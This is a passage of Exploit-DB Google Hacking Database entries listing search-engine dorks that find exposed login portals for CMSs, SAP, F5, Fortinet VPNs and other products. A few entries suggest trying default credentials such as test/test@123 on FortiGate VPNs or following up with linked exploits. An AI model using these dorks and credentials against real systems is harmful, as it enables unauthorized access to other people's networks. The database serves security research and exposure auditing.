inurl:/index.php/admin-login/ intitle:&quot;Admin login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/index.php/admin/ intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/index.php/admin/ intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6962</id>
<link>https://www.exploit-db.com/ghdb/6962</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/index.php/admin/authentication/ intext:clave</shortDescription>
<textualDescription># Exploit Title: Pages containing login portals
# Google Dork: inurl:/index.php/admin/authentication/ intext:clave
# Date: 2021-05-14
# Exploit Author: Aniket Prabhakar (prabhakar123456aniket@gmail.com)
</textualDescription>
<query>inurl:/index.php/admin/authentication/ intext:clave</query>
<querystring>https://www.google.com/search?q=inurl:/index.php/admin/authentication/ intext:clave</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>Aniket Prabhakar</author>
</entry>
<entry>
<id>4835</id>
<link>https://www.exploit-db.com/ghdb/4835</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/index.php/login intext:Concrete.CMS</shortDescription>
<textualDescription>Identify login portals of website that use Concrete CMS.
Author: Raj Kiran P
</textualDescription>
<query>inurl:/index.php/login intext:Concrete.CMS</query>
<querystring>https://www.google.com/search?q=inurl:/index.php/login intext:Concrete.CMS</querystring>
<edb></edb>
<date>2018-06-04</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>7826</id>
<link>https://www.exploit-db.com/ghdb/7826</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/intranet/login.php</shortDescription>
<textualDescription># Google Dork: inurl:/intranet/login.php
# Pages Containing Login Portals
# Date: 18/11/2021
# Exploit Author: Diego Bardalez Plaza
</textualDescription>
<query>inurl:/intranet/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/intranet/login.php</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Diego Bardalez Plaza</author>
</entry>
<entry>
<id>7871</id>
<link>https://www.exploit-db.com/ghdb/7871</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/intranet/signup</shortDescription>
<textualDescription># Google Dork: inurl:/intranet/signup
# Pages Containing Login Portals
# Date: 05/12/2021
# Exploit Author: S Rahul</textualDescription>
<query>inurl:/intranet/signup</query>
<querystring>https://www.google.com/search?q=inurl:/intranet/signup</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>S Rahul</author>
</entry>
<entry>
<id>5067</id>
<link>https://www.exploit-db.com/ghdb/5067</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/irj/portal</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP NetWeaver Login Portals ++
inurl:/irj/portal
- Finds SAP NetWeaver login portals
- Finds SAP Enterprise login portals
- Finds SAP NetWeaver server entry points
- Finds SAP NetWeaver servers of large companies
- 18 Vulnerabillites on Exploit DB available for SAP NetWeaver at the time of writing:
- https://www.exploit-db.com/exploits/44647
- https://www.exploit-db.com/exploits/44292
- https://www.exploit-db.com/exploits/40816
- ……. just search SAP NetWeaver and the desired Version
- 10.600 results at the time of writing
DISCLAIMER:
(The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system)
Some of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing
</textualDescription>
<query>inurl:/irj/portal</query>
<querystring>https://www.google.com/search?q=inurl:/irj/portal</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>4461</id>
<link>https://www.exploit-db.com/ghdb/4461</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/j_security_check;jsessionid=</shortDescription>
<textualDescription>Google dork : inurl:/j_security_check;jsessionid=
Description : This google dork can access a lot of login pages
Created by dekingofcyber ( sivabalan )</textualDescription>
<query>inurl:/j_security_check;jsessionid=</query>
<querystring>https://www.google.com/search?q=inurl:/j_security_check;jsessionid=</querystring>
<edb></edb>
<date>2017-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>7151</id>
<link>https://www.exploit-db.com/ghdb/7151</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/login site:.in</shortDescription>
<textualDescription># Google Dork: inurl:/login site:.in
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: Sarthi Shinde
</textualDescription>
<query>inurl:/login site:.in</query>
<querystring>https://www.google.com/search?q=inurl:/login site:.in</querystring>
<edb></edb>
<date>2021-09-02</date>
<author>sarthi shinde</author>
</entry>
<entry>
<id>6494</id>
<link>https://www.exploit-db.com/ghdb/6494</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/login.asp &quot;Configuration and Management&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/login.asp &quot;Configuration and Management&quot;
# Configuration and Management login portals.
# Date: 20/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/login.asp &quot;Configuration and Management&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/login.asp &quot;Configuration and Management&quot;</querystring>
<edb></edb>
<date>2020-08-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5670</id>
<link>https://www.exploit-db.com/ghdb/5670</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/login.aspx site:com.tr intitle:yönetim</shortDescription>
<textualDescription>Google Dork : inurl:/login.aspx site:com.tr intitle:yönetim
This one is finding some important login panel in my country . You can
change &quot;yönetim&quot; to &quot;management&quot; on global searching.
</textualDescription>
<query>inurl:/login.aspx site:com.tr intitle:yönetim</query>
<querystring>https://www.google.com/search?q=inurl:/login.aspx site:com.tr intitle:yönetim</querystring>
<edb></edb>
<date>2019-12-19</date>
<author>berat isler</author>
</entry>
<entry>
<id>5218</id>
<link>https://www.exploit-db.com/ghdb/5218</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/login.rsp</shortDescription>
<textualDescription>Find online DRV/XVR login page.
Dork : inurl:/login.rsp
Author : Islam Uddin (H4wK) https://h4wk-0x00.blogspot.com/
</textualDescription>
<query>inurl:/login.rsp</query>
<querystring>https://www.google.com/search?q=inurl:/login.rsp</querystring>
<edb></edb>
<date>2019-05-20</date>
<author>Islam Uddin</author>
</entry>
<entry>
<id>5079</id>
<link>https://www.exploit-db.com/ghdb/5079</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/login.zul</shortDescription>
<textualDescription>Login panel
ManhNho
</textualDescription>
<query>inurl:/login.zul</query>
<querystring>https://www.google.com/search?q=inurl:/login.zul</querystring>
<edb></edb>
<date>2019-01-18</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5390</id>
<link>https://www.exploit-db.com/ghdb/5390</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/Login/Admin intitle:&quot;Admin Login&quot;</shortDescription>
<textualDescription>Login page :
inurl:/Login/Admin intitle:&quot;Admin Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/Login/Admin intitle:&quot;Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/Login/Admin intitle:&quot;Admin Login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5322</id>
<link>https://www.exploit-db.com/ghdb/5322</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/login/index.jsp -site:hertz.*</shortDescription>
<textualDescription>Finding login page of sites
inurl:/login/index.jsp -site:hertz.*
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/login/index.jsp -site:hertz.*</query>
<querystring>https://www.google.com/search?q=inurl:/login/index.jsp -site:hertz.*</querystring>
<edb></edb>
<date>2019-08-05</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4661</id>
<link>https://www.exploit-db.com/ghdb/4661</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/login/index.php intitle:CentOS</shortDescription>
<textualDescription>inurl:/login/index.php intitle:CentOS
Finds CentOS Web Panel Login Pages. See http://centos-webpanel.com
</textualDescription>
<query>inurl:/login/index.php intitle:CentOS</query>
<querystring>https://www.google.com/search?q=inurl:/login/index.php intitle:CentOS</querystring>
<edb></edb>
<date>2018-01-24</date>
<author>InspecterNull</author>
</entry>
<entry>
<id>4794</id>
<link>https://www.exploit-db.com/ghdb/4794</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/mailscanner/login.php</shortDescription>
<textualDescription>Google Dork :: inurl:/mailscanner/login.php to get email filter
appliance login page (MailWatch Login)
Nisankh Acharjya
</textualDescription>
<query>inurl:/mailscanner/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/mailscanner/login.php</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>Nisankh Acharjya</author>
</entry>
<entry>
<id>5372</id>
<link>https://www.exploit-db.com/ghdb/5372</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/manage/login.html</shortDescription>
<textualDescription>Login Portal:
inurl:/manage/login.html
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/manage/login.html</query>
<querystring>https://www.google.com/search?q=inurl:/manage/login.html</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5402</id>
<link>https://www.exploit-db.com/ghdb/5402</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/member/login</shortDescription>
<textualDescription>Login page :
inurl:/member/login
inurl:/member/signin OR inurl:/member-signin/
inurl:/member/logon
inurl:&quot;/member.php?action=activate&quot;
inurl:&quot;/member.php&quot; intitle:&quot;Login&quot;
inurl:/memberlogin
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/member/login</query>
<querystring>https://www.google.com/search?q=inurl:/member/login</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>1223</id>
<link>https://www.exploit-db.com/ghdb/1223</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:&quot;Miva Merchant Administration Login&quot; -inurl:cheap-malboro.net</shortDescription>
<textualDescription>Miva Merchant is a product that helps buisnesses get into e-commerce. This dork locates their admin login.</textualDescription>
<query>inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:&quot;Miva Merchant Administration Login&quot; -inurl:cheap-malboro.net</query>
<querystring>https://www.google.com/search?q=inurl:/Merchant2/admin.mv+%7C+inurl:/Merchant2/admin.mvc+%7C+intitle:%22Miva+Merchant+Administration+Login%22+-inurl:cheap-malboro.net&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2005-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1126</id>
<link>https://www.exploit-db.com/ghdb/1126</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/modcp/ intext:Moderator+vBulletin</shortDescription>
<textualDescription>there have been several dorks for vBulletin, but I could not find one in the search that targets the moderators control panel login page - this search targets versions 3.0 onwards.</textualDescription>
<query>inurl:/modcp/ intext:Moderator+vBulletin</query>
<querystring>https://www.google.com/search?q=inurl:/modcp/+intext:Moderator%2BvBulletin&amp;c2coff=1&amp;safe=off&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2005-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>4096</id>
<link>https://www.exploit-db.com/ghdb/4096</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/my.logon.php3?</shortDescription>
<textualDescription>f5 Network Remote Access Logins
-Xploit</textualDescription>
<query>inurl:/my.logon.php3?</query>
<querystring>https://www.google.com/search?q=inurl:/my.logon.php3?</querystring>
<edb></edb>
<date>2015-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5382</id>
<link>https://www.exploit-db.com/ghdb/5382</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/oaam_server/login.do</shortDescription>
<textualDescription>Login page :
inurl:/oaam_server/login.do
site:*/login.do intitle:&quot;Sign On&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/oaam_server/login.do</query>
<querystring>https://www.google.com/search?q=inurl:/oaam_server/login.do</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4187</id>
<link>https://www.exploit-db.com/ghdb/4187</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/oam/server/obrareq.cgi | ext:&quot;encquery&quot; | ext:&quot;Portal_Webcenter&quot;</shortDescription>
<textualDescription>Login's for Oracle Access Management
-Xploit </textualDescription>
<query>inurl:/oam/server/obrareq.cgi | ext:&quot;encquery&quot; | ext:&quot;Portal_Webcenter&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/oam/server/obrareq.cgi | ext:&quot;encquery&quot; | ext:&quot;Portal_Webcenter&quot;</querystring>
<edb></edb>
<date>2016-01-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6386</id>
<link>https://www.exploit-db.com/ghdb/6386</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/opac/index.jsp</shortDescription>
<textualDescription># Google Dork : inurl:/opac/index.jsp
# Description : Pages containing login portals.
# Date: 09/07/2020
# Author: Jose Praveen
</textualDescription>
<query>inurl:/opac/index.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/opac/index.jsp</querystring>
<edb></edb>
<date>2020-07-09</date>
<author>Jose Praveen</author>
</entry>
<entry>
<id>7481</id>
<link>https://www.exploit-db.com/ghdb/7481</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/phpldapadmin/cmd.php</shortDescription>
<textualDescription># Google Dork: inurl:/phpldapadmin/cmd.php
# Pages Containing Login Portals
# Date:22/10/2021
# Exploit Author: Naïm Gallouj</textualDescription>
<query>inurl:/phpldapadmin/cmd.php</query>
<querystring>https://www.google.com/search?q=inurl:/phpldapadmin/cmd.php</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Naïm Gallouj</author>
</entry>
<entry>
<id>6585</id>
<link>https://www.exploit-db.com/ghdb/6585</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/phpPgAdmin/browser.php intext:&quot;Servers&quot; | &quot;PostgreSQL*&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/phpPgAdmin/browser.php intext:&quot;Servers&quot; |&quot;PostgreSQL*&quot;
# phpPgAdmin portals.
# Date: 30/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/phpPgAdmin/browser.php intext:&quot;Servers&quot; | &quot;PostgreSQL*&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/phpPgAdmin/browser.php intext:&quot;Servers&quot; | &quot;PostgreSQL*&quot;</querystring>
<edb></edb>
<date>2020-10-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7020</id>
<link>https://www.exploit-db.com/ghdb/7020</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/psp/ intext:&quot;ORACLE PEOPLESOFT&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/psp/ intext:&quot;ORACLE PEOPLESOFT&quot;
# Pages Containing Login Portals.
# Exploit Author: Sarmad Khan</textualDescription>
<query>inurl:/psp/ intext:&quot;ORACLE PEOPLESOFT&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/psp/ intext:&quot;ORACLE PEOPLESOFT&quot;</querystring>
<edb></edb>
<date>2021-07-20</date>
<author>Sarmad Khan</author>
</entry>
<entry>
<id>5083</id>
<link>https://www.exploit-db.com/ghdb/5083</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/pwm/public/</shortDescription>
<textualDescription># Exploit Title: PWM Password Manager Directory.
# Google Dork: inurl:/pwm/public/
# Description: Find PWM directories with login portals and/or user registration/activation forms.
# Date: 08/01/2019.
# Exploit Author: Sohaib E.B.
# Category: Pages Containing Login Portals
</textualDescription>
<query>inurl:/pwm/public/</query>
<querystring>https://www.google.com/search?q=inurl:/pwm/public/</querystring>
<edb></edb>
<date>2019-01-21</date>
<author>Sohaib E.B.</author>
</entry>
<entry>
<id>7932</id>
<link>https://www.exploit-db.com/ghdb/7932</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/RDWeb/Pages/en-US/ filetype:aspx ~login</shortDescription>
<textualDescription># Dork: inurl:/RDWeb/Pages/en-US/ filetype:aspx ~login
# Pages Containing Login Portals
# Date: 4/15/2022
# Exploit Author: Ronnie Bartwitz
# Description: A basic Google Dork to enumerate Remote Desktop gateways. Note that some may be locked behind Microsoft 365/AzureAD.</textualDescription>
<query>inurl:/RDWeb/Pages/en-US/ filetype:aspx ~login</query>
<querystring>https://www.google.com/search?q=inurl:/RDWeb/Pages/en-US/ filetype:aspx ~login</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Ronnie Bartwitz</author>
</entry>
<entry>
<id>4293</id>
<link>https://www.exploit-db.com/ghdb/4293</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/remote/login/ intext:&quot;please login&quot;|intext:&quot;FortiToken clock drift detected&quot;</shortDescription>
<textualDescription>Description : inurl:/remote/login/ intext:&quot;please login&quot;|intext:&quot;FortiToken
clock drift detected&quot;
Search : inurl:/remote/login/ intext:&quot;please login&quot;|intext:&quot;FortiToken
clock drift detected&quot;
Date: 05-06-2016
Author: Krishna
Summary:Exposed SSL VPN Login pages for Fortiguard SSL VPN.</textualDescription>
<query>inurl:/remote/login/ intext:&quot;please login&quot;|intext:&quot;FortiToken clock drift detected&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/remote/login/ intext:&quot;please login&quot;|intext:&quot;FortiToken clock drift detected&quot;</querystring>
<edb></edb>
<date>2016-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4555</id>
<link>https://www.exploit-db.com/ghdb/4555</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/remote/login?lang=en</shortDescription>
<textualDescription>Find FortiGate Firewall's SSL-VPN login portal.
once you connected with VPN you will get LAN access.
if you are lucky try
user = test
pass = test@123
Dagalti Kick</textualDescription>
<query>inurl:/remote/login?lang=en</query>
<querystring>https://www.google.com/search?q=inurl:/remote/login?lang=en</querystring>
<edb></edb>
<date>2017-07-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4258</id>
<link>https://www.exploit-db.com/ghdb/4258</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/Remote/logon?ReturnUrl</shortDescription>
<textualDescription>inurl:/Remote/logon?ReturnUrl
This google dork can access many outdated and vulnerable windows servers out there..
Created by Sivabalan ( CYBER GENIUS)</textualDescription>
<query>inurl:/Remote/logon?ReturnUrl</query>
<querystring>https://www.google.com/search?q=inurl:/Remote/logon?ReturnUrl</querystring>
<edb></edb>
<date>2016-04-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>8300</id>
<link>https://www.exploit-db.com/ghdb/8300</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/restgui/start.html</shortDescription>
<textualDescription># Google Dork: inurl:/restgui/start.html
# Pages Containing Login Portals
# Date: 01/11/2023
# Exploit: Louise E</textualDescription>
<query>inurl:/restgui/start.html</query>
<querystring>https://www.google.com/search?q=inurl:/restgui/start.html</querystring>
<edb></edb>
<date>2023-11-01</date>
<author>Louise E</author>
</entry>
<entry>
<id>5066</id>
<link>https://www.exploit-db.com/ghdb/5066</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/sap/bc/bsp</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP NetWeaver ABAP ++
inurl:/sap/bc/bsp
Finds SAP login portals
Finds SAP server entry points
Finds SAP servers of large companies
18 Vulnerabilities on Exploit DB available for SAP NetWeaver at the time of writing:
https://www.exploit-db.com/exploits/44647
https://www.exploit-db.com/exploits/44292
https://www.exploit-db.com/exploits/40816
……. just search SAP NetWeaver and the desired Version
66.100 results at the time of writing
DISCLAIMER:
The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system
Some of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing
</textualDescription>
<query>inurl:/sap/bc/bsp</query>
<querystring>https://www.google.com/search?q=inurl:/sap/bc/bsp</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>7923</id>
<link>https://www.exploit-db.com/ghdb/7923</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/sap/bc/webdynpro/ logon</shortDescription>
<textualDescription># Google Search: inurl:/sap/bc/webdynpro/ logon
# Pages Containing Login Portals
# Date: 20/01/2022
# Author: Zayed AlJaberi
# Google Dork Description: SAP Web Application Server
</textualDescription>
<query>inurl:/sap/bc/webdynpro/ logon</query>
<querystring>https://www.google.com/search?q=inurl:/sap/bc/webdynpro/ logon</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Zayed AlJaberi</author>
</entry>
<entry>
<id>4238</id>
<link>https://www.exploit-db.com/ghdb/4238</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/sap/bc/webdynpro/sap/ | &quot;sap-system-login-oninputprocessing&quot;</shortDescription>
<textualDescription>Logon - SAP Web Application Server and Job Search: inurl:/sap/bc/webdynpro/sap/ | &quot;sap-system-login-oninputprocessing&quot;
SAP Web Application Server Password Reset: inurl:/sap/bc/webdynpro/sap/ | &quot;ysccwa_password_reset?sap-client&quot;
-Xploit </textualDescription>
<query>inurl:/sap/bc/webdynpro/sap/ | &quot;sap-system-login-oninputprocessing&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/sap/bc/webdynpro/sap/ | &quot;sap-system-login-oninputprocessing&quot;</querystring>
<edb></edb>
<date>2016-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3860</id>
<link>https://www.exploit-db.com/ghdb/3860</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/secure/Dashboard.jspa intitle:&quot;System Dashboard&quot;</shortDescription>
<textualDescription>Finds login pages and system dashboards for Atlassian's JIRA.
- Andy G - twitter.com/vxhex</textualDescription>
<query>inurl:/secure/Dashboard.jspa intitle:&quot;System Dashboard&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/secure/Dashboard.jspa intitle:&quot;System Dashboard&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6401</id>
<link>https://www.exploit-db.com/ghdb/6401</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/seeyon/index.jsp</shortDescription>
<textualDescription># Google Dork : inurl:/seeyon/index.jsp
# Description : Pages containing login portals.
# Date: 11/07/2020
# Author: Jose Praveen
</textualDescription>
<query>inurl:/seeyon/index.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/seeyon/index.jsp</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Jose Praveen</author>
</entry>
<entry>
<id>5299</id>
<link>https://www.exploit-db.com/ghdb/5299</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/site/login.php</shortDescription>
<textualDescription># Exploit Title: Login PAge
# Google Dork: inurl:/site/login.php
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/site/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/site/login.php</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>4849</id>
<link>https://www.exploit-db.com/ghdb/4849</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/sitefinity intext:Copyright.(c)*Telerik. Site.Finity</shortDescription>
<textualDescription>This dork retrieves all the login page of website that use Sitefinity CMS.
inurl:/sitefinity/login intext:Login.to.manage.the.site.
The above dork also retrieves more login page of website that use
Sitefinity CMS.
Author: Abhinand Das A
</textualDescription>
<query>inurl:/sitefinity intext:Copyright.(c)*Telerik. Site.Finity</query>
<querystring>https://www.google.com/search?q=inurl:/sitefinity intext:Copyright.(c)*Telerik. Site.Finity</querystring>
<edb></edb>
<date>2018-06-07</date>
<author>Abhinand Das A</author>
</entry>
<entry>
<id>5878</id>
<link>https://www.exploit-db.com/ghdb/5878</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/sslvpn/Login/Login</shortDescription>
<textualDescription># Dork #
inurl:/sslvpn/Login/Login
Login Portals.
</textualDescription>
<query>inurl:/sslvpn/Login/Login</query>
<querystring>https://www.google.com/search?q=inurl:/sslvpn/Login/Login</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>5582</id>
<link>https://www.exploit-db.com/ghdb/5582</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/stafflogin</shortDescription>
<textualDescription>Login POrtal:
inurl:/stafflogin
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/stafflogin</query>
<querystring>https://www.google.com/search?q=inurl:/stafflogin</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5304</id>
<link>https://www.exploit-db.com/ghdb/5304</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/student/login.php</shortDescription>
<textualDescription># Exploit Title: Student login
# Google Dork: inurl:/student/login.php
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/student/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/student/login.php</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>5581</id>
<link>https://www.exploit-db.com/ghdb/5581</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/studentlogin</shortDescription>
<textualDescription>Login Portal:
inurl:/studentlogin
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/studentlogin</query>
<querystring>https://www.google.com/search?q=inurl:/studentlogin</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>8133</id>
<link>https://www.exploit-db.com/ghdb/8133</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/superadmin/login intext:login</shortDescription>
<textualDescription># Google Dork: inurl:/superadmin/login intext:login
# Pages Containing Login Portals
# Date:06/04/2023
# Exploit Author: Himanshu Mehta</textualDescription>
<query>inurl:/superadmin/login intext:login</query>
<querystring>https://www.google.com/search?q=inurl:/superadmin/login intext:login</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Himanshu Mehta</author>
</entry>
<entry>
<id>993</id>
<link>https://www.exploit-db.com/ghdb/993</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/SUSAdmin intitle:&quot;Microsoft Software Update Services&quot;</shortDescription>
<textualDescription>Microsoft SUS Server is a Patch Management Tool for Windows 2000, XP and 2003 systems.It can be used to gain access to a Patch Deployment server. If you successfully login to that server you can possibly compromise all the other network servers.</textualDescription>
<query>inurl:/SUSAdmin intitle:&quot;Microsoft Software Update Services&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%2FSUSAdmin+intitle%3A%22Microsoft+Software+Update+Services%22</querystring>
<edb></edb>
<date>2005-05-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>5303</id>
<link>https://www.exploit-db.com/ghdb/5303</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/system/login.php</shortDescription>
<textualDescription># Exploit Title: System Login
# Google Dork: inurl:/system/login.php
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/system/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/system/login.php</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>5305</id>
<link>https://www.exploit-db.com/ghdb/5305</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/teacher/login.php</shortDescription>
<textualDescription># Exploit Title: Teacher login page
# Google Dork: inurl:/teacher/login.php
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/teacher/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/teacher/login.php</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>4176</id>
<link>https://www.exploit-db.com/ghdb/4176</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/tmui/login.jsp</shortDescription>
<textualDescription>Administrative Panel Web F5 BIG-IP appliances
inurl:/tmui/login.jsp
@firebitsbr</textualDescription>
<query>inurl:/tmui/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/tmui/login.jsp</querystring>
<edb></edb>
<date>2016-01-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>8262</id>
<link>https://www.exploit-db.com/ghdb/8262</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/ui/login.aspx</shortDescription>
<textualDescription># Google Dork: inurl:/ui/login.aspx
# Pages Containing Login Portals
# Date: 18/10/2023
# Exploit Nishchayjeet Singh</textualDescription>
<query>inurl:/ui/login.aspx</query>
<querystring>https://www.google.com/search?q=inurl:/ui/login.aspx</querystring>
<edb></edb>
<date>2023-10-18</date>
<author>Nishchayjeet Singh</author>
</entry>
<entry>
<id>5578</id>
<link>https://www.exploit-db.com/ghdb/5578</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/userlogin</shortDescription>
<textualDescription>Login Portal:
inurl:/userlogin
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/userlogin</query>
<querystring>https://www.google.com/search?q=inurl:/userlogin</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7038</id>
<link>https://www.exploit-db.com/ghdb/7038</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/UserLogin intitle:&quot;::PayTV SMS::&quot; &quot;Aplomb Technology&quot;</shortDescription>
